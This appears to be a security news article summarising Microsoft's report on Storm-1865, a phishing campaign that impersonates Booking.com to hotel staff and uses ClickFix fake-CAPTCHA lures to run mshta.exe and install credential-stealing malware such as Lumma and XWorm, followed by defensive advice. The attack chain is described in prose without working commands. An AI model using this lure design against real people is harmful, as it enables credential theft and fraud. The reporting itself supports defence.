Ongoing Cyber Attack Mimic Booking.com to Spread Password-Stealing Malware

Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com.

The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft.

This attack specifically targets hospitality organizations across North America, Oceania, South and Southeast Asia, and various European regions, focusing on individuals likely to work directly with Booking.com.

As of February 2025, the campaign remains active and continues to evolve its tactics to bypass conventional security measures.

Deceptive Tactics Target Hospitality Staff Through Fraudulent Communications

The Storm-1865 threat actors have developed a methodical approach to infiltrating hospitality organizations by first identifying potential targets within these businesses who are likely to interact with Booking.com as part of their regular duties.

The attackers then craft malicious emails that impersonate the travel platform, with message content varying widely to increase the chances of engagement.

These fraudulent communications reference scenarios that would concern hospitality staff, including negative guest reviews, requests from prospective guests, online promotion opportunities, and account verification notifications.

Each email contains either a malicious link or a PDF attachment with an embedded link, purportedly directing recipients to the legitimate Booking.com website.

When users click on these links, they are directed to a convincing fake webpage that displays a counterfeit CAPTCHA overlay against a background designed to mimic the authentic Booking.com interface.

This deceptive design creates the illusion that Booking.com has implemented additional verification checks, which may give targeted users a false sense of security and increase the likelihood of compromise.

The attack methodology demonstrates a sophisticated understanding of the hospitality industry’s operations and effectively exploits the trusted relationship between hotels and the popular booking platform to deliver malicious payloads.

ClickFix Social Engineering Technique Enables Delivery of Multiple Malware Families

At the core of this campaign is the ClickFix social engineering technique, which represents an evolution in the threat actor’s approach to bypassing security measures.

This technique takes advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct users to perform specific actions to resolve supposed issues.

In this specific implementation, the fake CAPTCHA overlay instructs users to use a keyboard shortcut to open a Windows Run window, then paste and execute a command that the phishing page has surreptitiously added to the user’s clipboard.

This requirement for direct user interaction helps the attack evade automated security features that might otherwise detect and block malicious scripts.

The command executed through this method typically leverages mshta.exe to download and launch malicious code, which varies depending on the specific payload being delivered.

Microsoft has identified multiple families of commodity malware being distributed through this campaign, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.

Each of these malware variants possesses capabilities designed to steal financial data and credentials for fraudulent use, which aligns with the historical patterns observed in Storm-1865 activity.

The adoption of the ClickFix technique represents a significant evolution in the threat actor’s tactics, techniques, and procedures (TTPs), demonstrating their ongoing efforts to circumvent conventional security measures targeting phishing and malware distribution.

Protective Measures and Organizational Defenses Against Sophisticated Phishing Threats

Organizations can implement several strategies to protect themselves against this sophisticated phishing campaign and similar threats.

Education remains a critical component of defense, with staff training focused on identifying suspicious emails by checking sender addresses, being wary of urgent calls to action, hovering over links before clicking, and watching for typographical errors that often indicate phishing attempts.

Technical countermeasures also play a vital role in organizational protection against these threats.

Microsoft recommends deploying phishing-resistant authentication methods, enforcing multi-factor authentication (MFA) on all accounts, configuring Microsoft Defender for Office 365 to recheck links on click, and encouraging users to utilize web browsers that support protective features like Microsoft Defender SmartScreen.

Additional technical defenses include enabling cloud-delivered protection in antivirus products, implementing network protection to prevent access to malicious domains, enabling automated investigation and remediation capabilities, and activating Zero-hour auto purge (ZAP) in Office 365 to quarantine malicious messages.

Indicators of Compromise

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.